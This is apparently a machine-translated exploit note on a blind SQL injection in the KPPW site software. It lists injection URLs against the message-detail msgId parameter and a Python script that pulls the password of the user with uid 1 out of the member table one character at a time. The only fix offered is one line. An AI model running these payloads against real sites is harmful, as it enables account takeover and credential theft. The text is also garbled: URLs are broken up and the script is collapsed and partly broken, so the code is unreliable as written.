KPPW open-source witch system bypass protection blind note
KPPW open-source witch system bypass protection blind note
1.
Kppw SQL Injection
The vendor fixed the vulnerability. Union cannot be performed if union is replaced.
However, you can perform blind injection.
Same type, multiple points. However, the problem lies in the message.
2.
Register two accounts and send three messages to the other account.
3.
Open the url below
Http: // 192.168.1.101/KPPW/index. php? Do = user & view = message & op = detail & type = private & intPage = 1 & msgId = 16
Then try to inject
Next we can see the previous and next.
Injection Test
Http: // 192.168.1.101/KPPW/index. php? Do = user & view = message & op = detail & type = private & intPage = 1 & msgId = 16 and 1 = 1 --
Yes.
Http: // 192.168.1.101/KPPW/index. php? Do = user & view = message & op = detail & type = private & intPage = 1 & msgId = 16 and 1 = 2 --
It disappears.
3.
Mainly used url
Http: // 192.168.1.101/KPPW/index. php? Do = user & view = message & op = detail & type = private & intPage = 1 & msgId = 16 and (select CHAR (48 )) = SUBSTR (SELECT 'Password' from keke_witkey_member WHERE uid = 1), 1, 1 )--
Replace host url cookies with a small tool.
# Coding: utf-8import httplibdef get (i1, i2): page = "" rHtml = httplib. HTTPConnection ("192.168.1.101", 80, False) url = "/KPPW/index. php? Do = user & view = message & op = detail & type = notice & intPage = 1 & msgId = 13% 20and % 20% 28 select % 20 CHAR % 28 "+ i1 +" % 29% 29 = SUBSTR % 28% 28 SELECT % 20% 60 password % 60% 20 from % 20keke_witkey_member % 20 WHERE % 20uid % 20 = 1% 29, "+ i2 +", 1% 29 -- "# print urlrHtml. request ("GET", url, headers = {"User-Agent": "Firefox/22.0", "Accept": "text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 "," Accept-Language ":" en-US, en; q = 0.5 ", "Accept-Encoding ": "Gzip, deflate", "Cookie": "PHPSESSID = x", "Connection": "keep-alive"}) page = rHtml. getresponse (False) return page. read (). count ('barri') mm = [] for I in range (48,123): for ii in range (): if (get (str (ii ), str (I ))! = 0): mm. append (chr (ii) print "". join (mm) break
Solution:
Convert to int